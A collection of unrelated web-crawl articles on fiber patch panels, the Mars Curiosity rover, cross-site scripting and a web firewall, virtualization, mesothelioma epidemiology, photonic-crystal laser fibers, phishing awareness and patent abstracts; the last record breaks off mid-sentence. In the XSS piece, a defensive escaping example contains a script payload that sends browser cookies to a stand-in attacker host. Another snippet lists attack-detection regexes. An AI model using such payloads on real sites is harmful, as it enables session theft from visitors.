A fiber patch panel is usually composed of two parts: the compartment that contains fiber adapters (bulkhead receptacles), and the compartment that contains fiber optic splice trays and excess fiber cables. If the entire installation, including the fiber optic hubs, repeaters, or network adapters, uses the same type of fiber optic connectors, then the array can be made of compatible adapters or jacks. The adapters on a fiber-optic patch panel can come in a variety of different shapes. In most panels, all of the adapters are of the same type, but if there is more than one type of fiber optic connector used within the network, it may be necessary to get a panel with hybrid adapters. These types of adapters can be used to connect different types of connectors on fiber-optic cables.

There are two types of panels you can have: a wall-mounted one or a rack panel. A wall-mounted device, in its most basic form, can keep 12 different fibers separate from one another. If the fiber-optic cable has more than 12 fibers, the extra fibers can be moved to a second panel or an engineer can use a panel that is designed to hold more fibers separately. Wall-mounted panels can be constructed to hold up to 144 fibers at once. Wall mount fiber patch panels are space-saving and light in weight, while also being robust, strongly built and waterproof.
The fiber optic cable lines are designed to be easy to find and organize, and the optical fiber bend radius is kept at a safe level so that performance is not affected. Rack mount fiber optic patch panels are made of high quality materials and slide open like a drawer, giving an optical engineer easy access to the fibers inside. Inside the rack mount fiber patch panel are splice trays and splice sleeves, accessories, and optional pigtails of different types; common connector styles are SC/FC/ST/LC, and E2000 types can be custom made depending on quantity. Both rack mount and wall mount fiber optic patch panels can be custom made with different kinds of adapters and fiber pigtails pre-installed from FiberStore. If you do not have much space and do not have too many fiber optic cables to manage, you can have your panel mounted on a wall; otherwise, you will need a rack on which to place your cable panel.
<urn:uuid:2c705d7a-5b43-4f29-b5e2-1c6db6c1ae09>
CC-MAIN-2017-09
http://www.fs.com/blog/typtical-fiber-patch-panels-on-the-market.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00530-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934481
897
2.703125
3
NASA's Mars rover Curiosity has already achieved its initial mission, proving that the Red Planet could once have sustained life, but one scientist says its greatest accomplishments could be in the year ahead. "It is all part of the evolution of our understanding of Mars," Lisa May, NASA's lead program executive for Mars, told Computerworld. "We are going chapter by chapter of your favorite mystery novel, making progress to understand, what was it like, was anything there and where did the water go? With Curiosity ... we're peeling away the layers of a very complex story of a planet that could have been a sibling, if not a twin to Earth, at some point." NASA's super rover, Curiosity, hits its second anniversary working on the Red Planet with a series of scientific accomplishments under its belt. (Image: NASA) Curiosity hit a major milestone this week. The nuclear-powered, SUV-sized super rover landed on the surface of Mars on Aug. 5, 2012, PDT (Aug. 6, 2012, EDT). For two years, the robotic rover has worked on Mars, searching for signs that the planet ever held life, even in microbial form. The anniversary also means that Curiosity has made it through its initial mission, which lasted the length of one Martian year, or about 687 days. That doesn't mean that scientists are finished with Curiosity. May said NASA will work with the rover as long as it's still functioning. "Curiosity has already met its mission success criteria, but there's always the intention of continuing as long as our spacecraft lets us," May said. "We have spent $2.5 billion to send this spacecraft to Mars, and we'll use it to learn and explore as long as we can." After a journey of more than eight months and a distance of 350 million miles, Curiosity used a supersonic parachute, a tether and rockets to safely alight on Mars. NASA scientists called the time from when the spacecraft entered the Martian atmosphere to when it touched down on the planet's surface the "seven minutes of terror," because the roughly 14-minute delay for a signal from Mars to reach Earth meant they had no idea what was happening during the descent. Once it was safely on the ground, scientists and engineers quickly set Curiosity to work, and in the past two years the rover has made significant progress. Here are the top five scientific discoveries Curiosity has made so far: 1. Ancient Mars could have held life: Thanks to Curiosity, scientists found that ancient Mars likely had the right chemistry to support living microbes, according to NASA. By drilling into Martian rocks, the rover discovered what are believed to be the key ingredients for life -- carbon, hydrogen, oxygen, phosphorus and sulfur. Analyzing the makeup of the rocks, the rover found clay minerals and not too much salt. That tells researchers there once might have been drinkable water on the Red Planet. "We have found the minerals that we are familiar with as the building blocks of life," May said. "We've also found places that had water, which was a source of energy. There were places where the water was neither too acidic nor too salty. There are areas where the environment would have been habitable billions of years ago. That's probably the biggest thing we found." 2. Evidence of ancient water flows: Curiosity found rocks believed to have been smoothed and rounded by ancient water flows. The layers of exposed bedrock tell scientists a story of what was once a steady stream of water flowing about knee deep.
"It is surprising how much water persists under the surface of Mars and how much water must have been there," May said. "What happened? It either went into the rocks or out through the atmosphere." 3. Curiosity detects dangerous levels of radiation: Curiosity detected radiation levels that exceed NASA's career limit for astronauts. With this data in hand, the space agency's engineers can build spacecraft and spacesuits that are able to protect humans on deep space missions. 4. No methane, no life? In September 2013, NASA noted that the rover had not found a single trace of methane in the Martian atmosphere, decreasing the odds that there is life on Mars. Since living organisms, as we know them, produce methane, scientists had been trying to find the substance on the Red Planet, as proof that life might have once existed there. The hunt for methane continues. 5. Significant geological diversity: Scientists were surprised by the variety of soil and rock that they found in the Gale Crater, where Curiosity landed. According to NASA, Curiosity found different types of gravel, streambed deposits, what could possibly be volcanic rock, water-transported sand dunes, mudstones, and cracks filled with mineral veins. All of these yield clues to Mars' past. Today, Curiosity is closing in on its first good look of its ultimate destination, Mount Sharp. NASA scientists have wanted Curiosity to study Mount Sharp and its geological layers since the robot landed on Mars Now, the rover is about two miles away and nearing an outcrop of a base layer of the mountain. "Oh, I think this coming year is going to be even more exciting," said May. "Because we're going to get more detailed stories and compare stratigraphic layers, we're really going to learn about the history of Mars." Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is firstname.lastname@example.org. Read more about government/industries in Computerworld's Government/Industries Topic Center. This story, "Mars Rover Curiosity's Top 5 Scientific Discoveries" was originally published by Computerworld.
<urn:uuid:42324a8f-d551-4471-8e70-d80f7c8c2db2>
CC-MAIN-2017-09
http://www.cio.com/article/2461494/government/mars-rover-curiositys-top-5-scientific-discoveries.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171043.28/warc/CC-MAIN-20170219104611-00230-ip-10-171-10-108.ec2.internal.warc.gz
en
0.971805
1,193
3.484375
3
Cross-site scripting has repeatedly been at the top of both the OWASP Top Ten list and the CWE/SANS Top 25. Some reports show cross-site scripting, or XSS, vulnerabilities to be present in 7 out of 10 web sites, while others report that up to 90 percent of all web sites are vulnerable to this type of attack. Why are so many sites at risk? Because cross-site scripting attacks are so easy to perform. Basically, an attacker injects a malicious script into a web site, for example through a forum, comment section, or any other input area. Victims who later visit that web site need only load the injected page, or click a crafted link, for the exploit to run in their browser. There are a few facts about cross-site scripting attacks you should be aware of. Attackers are lured to XSS exploits because of how easy they are to perform, but they also know to follow the money: attacking a web site through a cross-site scripting vulnerability can be quite profitable for an attacker who knows how to harness this type of exploit. Without proactive Web application security in place to stop XSS attacks, you leave your site vulnerable, and web sites that have been exploited through XSS attacks have in turn been used against their own visitors. With the dotDefender web application firewall you can avoid XSS attacks because dotDefender inspects your HTTP traffic and determines whether your web site suffers from cross-site scripting vulnerabilities or other attacks, stopping web applications from being exploited. Architected as plug & play software, dotDefender provides out-of-the-box protection against cross-site scripting, SQL injection attacks, path traversal and many other web attack techniques. There are several reasons dotDefender offers such a comprehensive solution to web application security needs. Before a web site can be compromised, an attacker needs to find applications that are vulnerable to XSS. Unfortunately, most web applications, both Free/Open Source Software and commercial software, are susceptible. Attackers simply perform a Google search for terms that are often found in the software. Using search bots to automate this process means an attacker can find thousands of vulnerable web sites in minutes. Once a vulnerable web site is discovered, the attacker examines the HTML to find where the exploit code can be injected. After this has been determined, the attacker begins to code the exploit; there are three types of attacks that can be used. After the code has been written, it is injected into the target site, and the attacker can begin to reap the rewards. If the intent of the XSS attack was to steal user authentication credentials, usernames and passwords are collected. For attacks that center around keystroke logging, the attacker will begin to receive the logged results from the victims. If the intent was to inject spam links into a well-trusted site, the attacker will begin to see increased activity on their own sites due to higher traffic and higher search engine rankings. If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward. Cross-site scripting costs businesses not only in stolen data but also in damaged reputation. Owners who work hard to build a trusted site that delivers content, services, or products often find themselves hurt when loyal visitors lose trust in them after an attack.
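The mechanics described above are easier to see in miniature. The following snippet is only a generic illustration in Python with hypothetical page markup, not dotDefender's mechanism: it shows why unescaped user input is dangerous and how standard output encoding neutralizes it.

import html

def render_comment(comment: str) -> str:
    # html.escape converts characters such as <, > and " into HTML entities,
    # so a submitted <script> payload is displayed as harmless text in the
    # visitor's browser instead of being executed.
    return '<p class="comment">{}</p>'.format(html.escape(comment, quote=True))

# A stored-XSS style payload is neutralized once it is escaped:
malicious = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
print(render_comment(malicious))

With that background, the business impact described next is easier to appreciate.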
Visitors whose data is stolen, or whose computers are infected as the result of an innocent visit to your web site, are hesitant to return even if assurances are made that the site is now clean. Even after a vulnerable site is fixed, sites that contained malicious code from an XSS exploit are usually flagged by Google and other search engines. The time and effort required to restore a solid reputation with the search engines is an added cost that most web site owners never plan for. The threat posed by cross-site scripting attacks is not solitary: combined with other vulnerabilities like SQL injection, path traversal, denial-of-service attacks, and buffer overflows, the need for web site owners and administrators to be vigilant is not only important but can feel overwhelming. dotDefender's security approach eliminates the need to learn the specific threats that exist on each web application. The software that runs dotDefender focuses on analyzing the request and the impact it has on the application. Effective web application security is based on three web application security engines: Pattern Recognition, Session Protection and Signature Knowledgebase. The Pattern Recognition engine employed by dotDefender protects against malicious behavior such as SQL injection and cross-site scripting. The patterns are regular-expression based and designed to efficiently and accurately identify a wide array of application-level attack methods. As a result, dotDefender is characterized by an extremely low false positive rate. What sets dotDefender apart is that it offers comprehensive protection against cross-site scripting and other attacks while being one of the easiest solutions to use. In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the-box protection that can be easily managed through a browser-based interface with virtually no impact on your server or web site's performance.
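dotDefender's actual rule set is proprietary, so the following toy sketch only illustrates the general idea of regular-expression-based request inspection described above; the patterns and parameter names are illustrative assumptions, not product rules.

import re

# Illustrative patterns only; real WAF rule sets are far larger and more precise.
SUSPICIOUS_PATTERNS = [
    re.compile(r"<\s*script", re.IGNORECASE),             # inline script injection
    re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE),  # classic SQL injection shape
    re.compile(r"\.\./"),                                  # path traversal
]

def inspect_request(params: dict) -> list:
    # Return (field, pattern) pairs for every request parameter that matches
    # one of the suspicious patterns, so the request can be logged or blocked.
    findings = []
    for field, value in params.items():
        for pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(value):
                findings.append((field, pattern.pattern))
    return findings

print(inspect_request({"q": "laptops", "comment": "<script>alert(1)</script>"}))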
<urn:uuid:8140cbc6-9d7b-412b-895d-4853aeb09b91>
CC-MAIN-2017-09
http://www.applicure.com/solutions/prevent-cross-site-scripting-attacks
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00579-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940567
1,073
2.8125
3
Virtualization has been a major data center trend for a number of years, driven by companies' desire for greater operating efficiency, lower capital costs, better use of existing floor and rack space, and reduced energy consumption. The heart of virtualization is the hypervisor, or virtualization layer, which hides the server hardware and presents a "generalized" environment in which processes can run. These processes, or virtual machines, can be anything from single applications to entire operating systems. A number of benefits accrue from virtualization; one of the key features underlying these benefits is that the hypervisor presents a common platform to virtual machines regardless of the underlying hardware. Thus, the virtual machines need not be tailored to a variety of different servers, storage systems and so on; instead, they need only operate within the common virtualized environment. This characteristic enables, for instance, easy portability of virtual machines among different hardware systems (as long as those systems run the same hypervisor). Furthermore, backup (or, more particularly, restoration) is simplified because of the single, unifying virtualization layer. In addition, this approach allows multiple virtual machines to run on a single server while maintaining isolation. Instead of dedicating an entire server to a single process, a configuration that, according to some estimates, yields hardware utilization rates below 10% in some data centers, servers can run as many processes as necessary to increase utilization while still dedicating sufficient resources to each process. Naturally, over time virtual machine technology has expanded and improved, encompassing more features and capabilities in critical areas such as security and operating isolation. Here's a snapshot of the current state of virtual machines, as well as where they may be headed in coming years.
<urn:uuid:7f093983-6ea6-4f1a-aaf8-d872a0a77634>
CC-MAIN-2017-09
http://www.datacenterjournal.com/virtual-machine-technology/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00631-ip-10-171-10-108.ec2.internal.warc.gz
en
0.919218
358
2.765625
3
Marinaccio A.,Unit of Occupational and Environmental Epidemiology | Binazzi A.,Unit of Occupational and Environmental Epidemiology | Bonafede M.,Unit of Occupational and Environmental Epidemiology | Corfiati M.,Unit of Occupational and Environmental Epidemiology | And 74 more authors. Occupational and Environmental Medicine | Year: 2015 Introduction Italy produced and imported a large amount of raw asbestos, up to the ban in 1992, with a peak in the period between 1976 and 1980 at about 160 000 tons/year. The National Register of Mesotheliomas (ReNaM, "Registro Nazionale dei Mesoteliomi" in Italian), a surveillance system of mesothelioma incidence, has been active since 2002, operating through a regional structure. Methods The Operating Regional Center (COR) actively researches cases and defines asbestos exposure on the basis of national guidelines. Diagnostic, demographic and exposure characteristics of non-occupationally exposed cases are analysed and described with respect to occupationally exposed cases. Results Standardised incidence rates for pleural mesothelioma in 2008 were 3.84 (per 100 000) for men and 1.45 for women, respectively. Among the 15 845 mesothelioma cases registered between 1993 and 2008, exposure to asbestos fibres was investigated for 12 065 individuals (76.1%), identifying 530 (4.4%) with familial exposure (they lived with an occupationally exposed cohabitant), 514 (4.3%) with environmental exposure to asbestos (they lived near sources of asbestos pollution and were never occupationally exposed) and 188 (1.6%) exposed through hobby-related or other leisure activities. Clusters of cases due to environmental exposure are mainly related to the presence of asbestos-cement industry plants (Casale Monferrato, Broni, Bari), to shipbuilding and repair activities (Monfalcone, Trieste, La Spezia, Genova) and soil contamination (Biancavilla in Sicily). Conclusions Asbestos pollution outside the workplace contributes significantly to the burden of asbestos-related diseases, suggesting the need to prevent exposures and to discuss how to deal with compensation rights for malignant mesothelioma cases induced by nonoccupational exposure to asbestos. Source Corfiati M.,Epidemiology Unit | Scarselli A.,Epidemiology Unit | Binazzi A.,Epidemiology Unit | Di Marzio D.,Epidemiology Unit | And 75 more authors. BMC Cancer | Year: 2015 Background: Previous ecological spatial studies of malignant mesothelioma cases, mostly based on mortality data, lack reliable data on individual exposure to asbestos, thus failing to assess the contribution of different occupational and environmental sources in the determination of risk excess in specific areas. This study aims to identify territorial clusters of malignant mesothelioma through a Bayesian spatial analysis and to characterize them by the integrated use of asbestos exposure information retrieved from the Italian national mesothelioma registry (ReNaM). Methods: In the period 1993 to 2008, 15,322 incident cases of all-site malignant mesothelioma were recorded and 11,852 occupational, residential and familial histories were obtained by individual interviews. Observed cases were assigned to the municipality of residence at the time of diagnosis and compared to those expected based on the age-specific rates of the respective geographical area. A spatial cluster analysis was performed for each area applying a Bayesian hierarchical model. Information about modalities and economic sectors of asbestos exposure was analyzed for each cluster. 
Results: Thirty-two clusters of malignant mesothelioma were identified and characterized using the exposure data. Asbestos cement manufacturing industries and shipbuilding and repair facilities represented the main sources of asbestos exposure, but a major contribution to asbestos exposure was also provided by sectors with no direct use of asbestos, such as non-asbestos textile industries, metal engineering and construction. A high proportion of cases with environmental exposure was found in clusters where asbestos cement plants were located or a natural source of asbestos (or asbestos-like) fibers was identifiable. Differences in type and sources of exposure can also explain the varying percentage of cases occurring in women among clusters. Conclusions: Our study demonstrates shared exposure patterns in territorial clusters of malignant mesothelioma due to single or multiple industrial sources, with major implications for public health policies, health surveillance, compensation procedures and site remediation programs. © 2015 Corfiati et al.; licensee BioMed Central. Source
<urn:uuid:c6f59fb9-53ee-44fd-8464-fd3d6d18fbba>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/cor-lazio-998855/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00155-ip-10-171-10-108.ec2.internal.warc.gz
en
0.909872
941
2.546875
3
Modeling of photonic crystals at NSF supercomputing centers, now partners in the TeraGrid, over several years has led the way to a major advance in laser surgery, exemplifying how computational simulations no longer take a back seat in driving scientific discovery. In November 2004, a woman in North Carolina with potentially suffocating growths in her larynx and trachea had them removed by a high-power laser — and went home the same day. This condition had never before been treated without anesthesia and operating-room surgery. Six years earlier, physicists at MIT used supercomputers to learn something no one knew about mirrors. These two seemingly separate events indeed are linked. A new laser technology, developed from a startling insight into the physics of light, may have saved the woman's life and, at the least, promises huge savings in the treatment of her disease — recurrent respiratory papillomatosis — one that affects tens of thousands of people in the United States alone. It's a success, furthermore, that exemplifies how supercomputing is no longer merely a supporting character, but with increasing frequency plays a lead role in scientific discovery. In 1998, John Joannopoulos and his team of researchers at MIT discovered what has come to be called a “perfect mirror.” Their “eureka!” moment came not in the laboratory or with pencil and paper working out of mathematical theory; it happened because a computational model produced results no one expected. For the past decade, Joannopoulos and his team have pushed forward new understanding of “photonic crystals” — fascinating materials, crafted from layers of silicon, which have unprecedented ability to trap, guide and control light. While he works closely with a laboratory team, headed by MIT professor Yoel Fink, to fabricate these challenging materials, a key to this work driving forward has been computational simulations that predict — successfully and precisely — how photonic crystals will work in advance of actually making them. “Computation,” said Joannopoulos, “has played a dominant role in the study of photonic crystals.” The Perfect Mirror It may be the most significant advance in mirror technology, said the New York Times, since Narcissus fell in love with his own image in a pool of water. The perfect mirror is so called because it reflects light at any angle with virtually no loss of energy. As a result, it makes possible a number of applications in optical technology, the most significant to date being flexible optical fiber that can transmit the high-powered CO2 lasers used in endoscopic surgery. Until Joannopoulos' team's 1998 finding, reported with a paper in Science, mirrors were understood to come in two basic flavors, both with inherent limitations. Everyone who looks in the bathroom mirror for signs of life in the morning knows about metallic mirrors. They work all too well for seeing your own face, but they don't work to make optical fiber because a large portion of the light leaks away, absorbed by the metal, rather than reflected. For optical fiber and other applications where energy loss matters, the choice has been mirrors made from dielectrics — materials that don't conduct electricity well. Dielectrics generally don't reflect light well either, but scientists have found ways to alternate thin dielectric layers of different reflective properties to achieve reflection without energy loss. 
The drawback has been that these dielectric mirrors reflect light only from certain angles, and their application depends on being able to use light at a limited range of angles and frequencies. This limitation was thought to be a law of nature, like gravity – no way to get around it — until 1998, when Joannopoulos and company noticed anomalous results from a computational model of a photonic crystal mirror they were running at the San Diego Supercomputer Center. The light seemed to reflect at a much larger angle than was thought possible. “We saw some interesting results in the computation,” he said. “Then came the theory to explain the computation, and then came a real experiment making something like this and testing it.” The result: a multi-layered dielectric mirror that reflects light from all angles without energy loss. Within a few years, the perfect mirror proved to be the solution for delivering a high-powered laser via flexible optical fiber. Open Wide for a High-Power Laser Fiber optics to transmit visible light, based on conventional dielectric mirror technology, has been around for years. These silica-based fibers have a light-carrying core with an index-of-refraction higher than the surrounding material. This layered approach traps light within the inner core — called “total internal reflection.” It works well for visible light, but high-power lasers — such as CO2 lasers used in endoscopic surgery — will melt conventional optical fiber. Joannopoulos and Fink realized that the perfect mirror offered a potential solution for high-power transmission. With further computations and pioneering laboratory work, the team developed a hollow-core fiber — essentially a dielectric perfect mirror rolled up into a tube — designed in such a way, based on photonics, to transmit high-power lasers. To take this idea beyond the laboratory into useful applications, in 2000, Joannopoulos and Fink helped form OmniGuide Communications, a company dedicated to developing and marketing the new hollow-core fiber. Further computations over the next few years — in San Diego, Illinois and Pittsburgh — explored other fundamental issues and phenomena of this new class of cylindrical photonic-crystal fiber. In endoscopic surgery, the lack of a fiber for high-power transmission has meant that the laser had to be delivered to a patient via an apparatus with an articulated arm and large handpiece — which has precluded using these precise lasers for many minimally invasive procedures. For this reason, the surgery to treat RRP required dislocating the patient's jaw and general anesthesia, so that the laser could be brought close enough to the affected area. A test case for OmniGuide's hollow-core fiber presented itself last year. In serious cases of RRP, the surgery often must be repeated to keep the breathing passage open. Dr. Jamie Koufman, director of the Center for Voice and Swallowing Disorders of Wake Forest University Baptist Medical Center, had a woman RRP patient who had undergone several previous RRP surgeries, but once again had developed near-total obstruction of the larynx and trachea. Koufman obtained FDA approval to use the prototype fiber. She used a numbing topical spray in the throat and trachea, requiring no anesthesia, and with a CO2 laser delivered via an OmniGuide fiber cleared the RRP growths. The patient, who went home that day, is doing fine. “Unsedated, laryngeal laser surgery with the OmniGuide fiber is a dream come true for me as an endoscopic surgeon,” said Koufman. 
“The patient loved it because it was easy for her.” Typical cost of RRP operating-room surgery with general anesthesia is $25,000. With expected FDA approval, the new procedure promises large cost savings nationally. “These novel optical fibers, based on photonic crystals offer a new approach for medical lasers, making it possible to guide a CO2 laser beam, which can cut tissue with high precision, into a patient's body through a very small incision,” said Joannopoulos. “It will likely prove itself useful for many procedures.” Computational science has come a long way over the past 20 years,” he added. “Even well known equations can have remarkable unexpected consequences that we would never learn about without these powerful computational engines, such as LeMieux (PSC's terascale system). This is just one advance that highlights how these machines are invaluable tools of discovery.” Michael Schneider is a senior science writer at the Pittsburgh Supercomputing Center.
<urn:uuid:25a26aed-4fec-4434-b8b9-905d0f7e4788>
CC-MAIN-2017-09
https://www.hpcwire.com/2005/09/01/healing_light-1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00575-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949788
1,649
3
3
Most people have heard of phishing and have an intuitive grasp of what it means. Images come to mind of bright shiny lures tempting hapless fish into taking a bite of something that will cause their demise. Indeed, this concept holds true whether you're a rainbow trout or a run-of-the-mill worker idly surfing the web at your desk. But unlike fishing in the traditional sense, with its watchful serenity or, to some, unrelenting tedium, what does phishing entail in the virtual world of hackers, malware and data loss? Phishing scams usually involve fraudulent emails from cybercriminals pretending to be someone else in order to steal money, information, or a person's identity. These emails are especially harmful to businesses, where a single employee can accidentally open the wrong email and bring a whole company to its knees. Phishing scams have been around for a while, but people still fall for them all the time. A recent study found that, on average, people open one in every three phishing emails, and the FBI notes that such scams have resulted in a loss of $3.1 billion worldwide. With the recent rise of malicious software (aka malware) such as ransomware, phishing emails have become more harmful than ever before. Hackers Get Creative: There's an impressive array of phishing scams out there, angling to snag unwary users. Here are some common types to watch for: - Spear Phishing refers to emails that trick individuals into performing an action (like clicking bad links and downloading infected attachments) or giving out personal information (like banking information and passwords). Hackers will use social media posts to see where victims have been, where they're going, and what they recently bought. For example, if hackers see a tweet that you recently purchased a new iPhone on Amazon, they might send you an email urging you to click on a link. Once you click, you're directed to a legitimate-looking webpage that requests updated credit card information, which goes straight to the hackers. - Soft Targeting refers to emails that target large groups of people who all share an attribute, like the same job title. By using vague language, the scammers can successfully target different people using the same email. One popular soft targeting scam involves sending HR departments fake resumes infected with ransomware. Attachments are often sent as a .zip file, which can hide all sorts of malicious files inside. When employees open the resume, the ransomware infects the computer instantly, putting valuable information and entire businesses at risk. - Whaling refers to scams that target senior executives who likely have access to large amounts of money. Before attacking, hackers may comb through social media posts to learn the names of key executives, payment schedules, and anything else that will help their emails look convincing. Last year, a Mattel finance executive was the target of a whaling scam when she received an email that appeared to come from the new CEO, requesting a large amount of money. The executive sent off $3 million, only to realize her mistake a few days later. Mattel eventually got its money back, but only because of a banking holiday. An Ounce of Prevention: Although there's no way to eliminate all threats, there are several simple techniques you can adopt to prevent a phishing attack or mitigate one after it happens.
- Educate Users: Educating users about safe browsing practices, the consequences of malware infection, and the latest threats is an important first step. It can also help to involve different departments in addition to IT. To supplement user education, many companies run mock phishing exercises, where IT sends out emails that simulate popular phishing scams and gathers information on employee behavior and compliance. Such testing helps companies understand whether employees are disregarding guidelines and putting the company at risk. - Create Unique Passwords: An estimated 63% of data breaches involve overly simplistic passwords or passwords reused across different accounts. While it may be difficult for users to remember several complex passwords, creating distinct passwords for every account makes things more difficult for hackers as well. - Flag Outside Emails: Scammers often use email addresses that look similar to a company's email addresses in order to trick employees into thinking the sender is a coworker. For this reason, it's important to flag all emails that come from outside the company so employees can think twice before clicking links or sending money (a simple example of such flagging is sketched at the end of this article). - Limit User Privileges: Because workers with administrative privileges often have access to important data, they're a favorite target of hackers. Limiting the number of people with such privileges makes it more difficult for hackers to succeed. - Disable Java and Macros: Malware is routinely delivered through exploited Microsoft Office documents and Java scripts, both of which can circumvent anti-virus programs. To address this, IT should replace Java and macro scripts with much safer programs. - Back Up Data: Because prevention doesn't always work, a solid backup plan is essential. In particular, it's a good idea to keep several copies of backup files in different locations and formats, since the more backups you have, the easier it will be to recover your data. And since hackers are learning how to infect backup data, it's important to have as many different backups as possible. That way, if your system becomes infected with malware, all you have to do is wipe it clean and reconnect to your backups. Backing up data and systems to the cloud or using a dedicated colocated backup server provides access to built-in firewalls and other useful security measures. Anti-malware systems can't always keep up with ransomware's frantic permutations designed to sidestep detection. Additionally, paying the ransom doesn't mean you'll absolutely get your data back; key corruption and other issues can arise that permanently lock you out of your data and could, depending on the size of the business, force it into failure. Better protection takes a two-phase approach that leverages both detection technologies and backup. The benefit of the cloud is that it isn't on-premise and, depending on how the vendor has designed its architecture, can be impervious to infection by such a virus. This is an advantage of being cloud-native vs. being retrofitted to the cloud. When someone falls victim to a phishing scam, they should immediately disconnect any infected computers from the Internet to avoid any further infection or data loss. It's also important to contact your local FBI field office and file a complaint with the IC3 at www.IC3.gov. True, you may not be able to undo a phishing scam. However, if you've backed up everything across your enterprise, you can survive the ordeal with your assets intact and nothing more than a few scrapes and bruises to show for it.
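Flagging outside email, as mentioned in the list above, is normally done at the mail gateway, but the core check is simple. The sketch below is a minimal Python illustration that assumes a made-up company domain; it is not taken from Druva or any specific mail product.

from email.utils import parseaddr

COMPANY_DOMAIN = "example.com"  # hypothetical company domain

def flag_external(subject: str, from_header: str) -> str:
    # Prepend an [EXTERNAL] tag to the subject when the sender's domain
    # is not the company's own domain.
    _, address = parseaddr(from_header)
    domain = address.rsplit("@", 1)[-1].lower() if "@" in address else ""
    if domain != COMPANY_DOMAIN:
        return "[EXTERNAL] " + subject
    return subject

print(flag_external("Invoice attached", "CEO <ceo@examp1e.com>"))  # gets tagged
print(flag_external("Team lunch", "hr@example.com"))               # left untouched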
To learn more about how to minimize the impact of malware with backup, download our Insider’s Guide.
<urn:uuid:d6072027-9908-4ac9-afdf-78d5d2b40dfe>
CC-MAIN-2017-09
https://www.druva.com/blog/feeling-like-fish-water-get-skinny-phishing-learn-protect-business/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00275-ip-10-171-10-108.ec2.internal.warc.gz
en
0.93743
1,439
3.078125
3
Villagomez D.,University of Geneva | Villagomez D.,Analysis Inc. | Spikings R.,University of Geneva Lithos | Year: 2013 New thermochronological data record a complex cooling history in the Central and Western Cordilleras of Colombia that is a function of Early Cretaceous to late Miocene tectonic events. Alkali-feldspar 40Ar/39Ar cooling ages of ~138-130Ma immediately post-date the cessation of Jurassic arc-magmatism and a major unconformity within the retro-foreland region of the northern Andes. We interpret these ages as cooling driven by exhumation in response to either compression driven by subduction of a seamount, or extension and oceanward migration of the slab during the earliest Cretaceous, giving rise to the Lower Cretaceous Quebradagrande arc sequence. Biotite and alkali-feldspar 40Ar/39Ar data from the palaeocontinental margin reveal the presence of a younger cooling event at 117-107Ma, which was contemporaneous with hornblende 40Ar/39Ar cooling ages obtained from medium-high P-T metamorphic relicts of a Late Jurassic-Early Cretaceous subduction channel. This cooling event is attributed to exhumation driven by the collision and accretion of a fringing arc against the continental margin, and obduction of the subduction channel onto the forearc. Inverse modelling of zircon and apatite fission track and (U-Th)/He data from throughout the Central and Western Cordilleras reveals three periods of rapid cooling since the Late Cretaceous. The earliest phase is recorded by Jurassic and Cretaceous granitoids that cooled rapidly during 75-65Ma. We attribute cooling to exhumation of the continental margin during ~75-70Ma (~1.6km/My), which was forced by the collision and accretion of the Caribbean Large Igneous Province in the Campanian. The Central Cordillera exhumed at moderate rates of ~0.3km/My during ~45-30Ma, which are also observed over widely dispersed regions along the Andean chain, and were probably caused by an increase in continent-ocean plate convergence rates. Exhumation rates drastically increased in the middle-late Miocene, with the greatest amount occurring in southern Colombia as a consequence of the collision and subduction of the buoyant Carnegie Ridge at 15Ma. © 2013 Elsevier B.V.. Source Analysis Inc. | Date: 2010-11-09 An active air heater is constructed to produce heat and to transfer heat to an air flow for heating a building. The active air heater comprises spaced apart fins; adjacent elements between the fins; and an electrical source directing an electrical current through the fins and the adjacent elements for heating the fins and the adjacent elements and the air flowing through the air flow passageways formed by the adjacent elements. The adjacent elements are porous, semi-conductor material having a roughness in its surfaces for enhancing the convective heat transfer between the material and the air flow. The active air heater may be rectangular or cylindrical. The porous, semi-conductor material includes carbon foams, ceramic foams, high temperature polymer foams, and low conductance alloy foams and the aforementioned materials in nano-material format. Analysis Inc. | Date: 2013-06-28 A simple and compact apparatus, and a method, for determining the characteristics of a number of fluids used in the truck and automotive industries including coolant, bio-diesel, gas-ethanol and diesel engine fluid (DEF). The apparatus includes a sample container providing optical paths of different lengths for making measurements on a sample. 
The dual path length design allows the apparatus to capture both NIR and UV spectral ranges. The qualitative and quantitative properties of the fluid under test are compared to test results under normal conditions or to the properties of unused fluid. Two light sources are used within a spectrometer with each source being associated with a different optical path length. National Health Research Institute and Analysis Inc. | Date: 2012-07-09 A specimen kit having a tiny chamber is disclosed for a specimen preparation for TEM. The space height of the chamber is far smaller than dimensions of blood cells and therefore is adapted to sort nanoparticles from the blood cells. The specimen prepared under this invention is suitable for TEM observation over a true distribution status of nanoparticles in blood. The extremely tiny space height in Z direction eliminates the possibility of aggregation of the nanoparticles and/or agglomeration in Z direction during drying; therefore, a specimen prepared under this invention is suitable for TEM observation over the dispersion and/or agglomeration of nanoparticles in a blood. Analysis Inc. | Date: 2010-10-20 Moving object detecting, tracking, and displaying systems are provided. Systems illustratively include a graphical user interface and a processing unit. The processing unit is a functional part of the system that executes computer readable instructions to generate the graphical user interface. The graphical user interface may include an alert and tracking window that has a first dimension that corresponds to a temporal domain and a second dimension that corresponds to a spatial domain. In some embodiments, alert and tracking windows include target tracking markers. Target tracking markers optionally 